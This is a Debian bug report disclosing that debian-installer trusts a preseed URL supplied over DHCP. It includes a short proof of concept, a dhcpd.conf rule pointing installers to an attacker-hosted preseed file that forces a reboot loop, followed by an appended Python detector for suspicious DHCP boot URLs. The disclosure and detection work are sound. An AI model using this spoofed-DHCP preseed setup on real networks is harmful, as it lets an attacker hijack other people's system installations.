
Bug#788634: debian-installer: Accepting a preseed URL from DHCP allows attacker to hijack installation



Package: debian-installer
Severity: important
Tags: d-i, security

Dear Maintainer,

I emailed the following to debian-security and was advised to open a public bug for it.

Debian-installer will accept a preseed URL provided via a DHCP option, even when installed from CD-ROM. No authentication of this parameter can be performed, and the user is not prompted before it is accepted due to the nature of preseeding. Due to this, an attacker on the local network can spoof a DHCP response pointing to their own preseed file, which can do all sorts of mischief (such as adding users or executing commands).

An example:

in dhcpd.conf:
  if substring(option vendor-class-identifier, 0, 3) = "d-i" { filename "http://192.168.1.1/preseed.txt"; }
and in /var/www/preseed.txt:
  d-i preseed/early_command string reboot

which will send the client into a reboot loop.

I'm not sure of the best way to mitigate this, without annoying people who use this feature. Perhaps a kernel commandline arg to specifically enable preseed via DHCP is a good idea? I understand that one expected use case is for an administrator to specify an apt mirror via DHCP preseed, so that even users installing from their own CD/DVD will pick it up, which would break in this scenario. 

-- System Information:
Debian Release: wheezy/sid
  APT prefers precise-updates
  APT policy: (500, 'precise-updates'), (500, 'precise-security'), (500, 'precise'), (100, 'precise-backports')
Architecture: amd64 (x86_64)

Kernel: Linux 3.11.0-15-generic (SMP w/1 CPU core)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
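
A detection-side sketch for the behaviour reported above, added here as an example and not part of the original report or of debian-installer: it parses a raw DHCP reply and flags one that hands out an http(s) boot file name from a server outside an allowlist. The allowlist address, the function names and the sample packets are assumptions constructed for illustration; the check assumes the URL travels in the BOOTP `file` field or option 67.

```python
import ipaddress
import struct

MAGIC = b"\x63\x82\x53\x63"          # DHCP magic cookie after the 236-byte BOOTP header
ALLOWED_SERVERS = {"192.168.1.254"}  # assumption: the site's legitimate DHCP server

def parse_options(data):
    """Walk DHCP options (code, length, value) until End (255); skip Pad (0)."""
    opts, i = {}, 0
    while i < len(data) and data[i] != 255:
        if data[i] == 0:
            i += 1
            continue
        if i + 1 >= len(data):
            break  # truncated option header
        length = data[i + 1]
        opts[data[i]] = data[i + 2:i + 2 + length]
        i += 2 + length
    return opts

def boot_url_finding(packet):
    """Return (server, url) when a DHCP reply from an unlisted server names an
    http(s) boot file, else None."""
    if len(packet) < 240 or packet[0] != 2 or packet[236:240] != MAGIC:
        return None  # not a BOOTREPLY carrying DHCP options
    opts = parse_options(packet[240:])
    sid = opts.get(54, b"")  # option 54: server identifier
    server = str(ipaddress.IPv4Address(sid if len(sid) == 4 else packet[20:24]))
    candidates = [opts.get(67, b"")]  # option 67: bootfile name
    if not (opts.get(52, b"\x00") or b"\x00")[0] & 1:  # option 52 bit 0: 'file' holds options
        candidates.append(packet[108:236])  # fixed BOOTP 'file' field
    for raw in candidates:
        name = raw.split(b"\x00", 1)[0].decode("ascii", "replace")
        if name.lower().startswith(("http://", "https://")) and server not in ALLOWED_SERVERS:
            return server, name
    return None

def build_reply(server_ip, filename):
    """Constructed sample DHCPACK (not captured traffic) for exercising the check."""
    srv = ipaddress.IPv4Address(server_ip).packed
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s", 2, 1, 6, 0, 0x1234, 0, 0,
                        bytes(4), bytes([192, 168, 1, 50]), srv, bytes(4),
                        bytes(16), b"", filename.encode("ascii"))
    return fixed + MAGIC + bytes([53, 1, 5, 54, 4]) + srv + b"\xff"

if __name__ == "__main__":
    print(boot_url_finding(build_reply("192.168.1.1", "http://192.168.1.1/preseed.txt")))
    print(boot_url_finding(build_reply("192.168.1.254", "http://192.168.1.254/preseed.txt")))
```

Option 54 comes from the reply itself, so the allowlist is a triage aid for spotting unexpected servers, not authentication of the reply.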

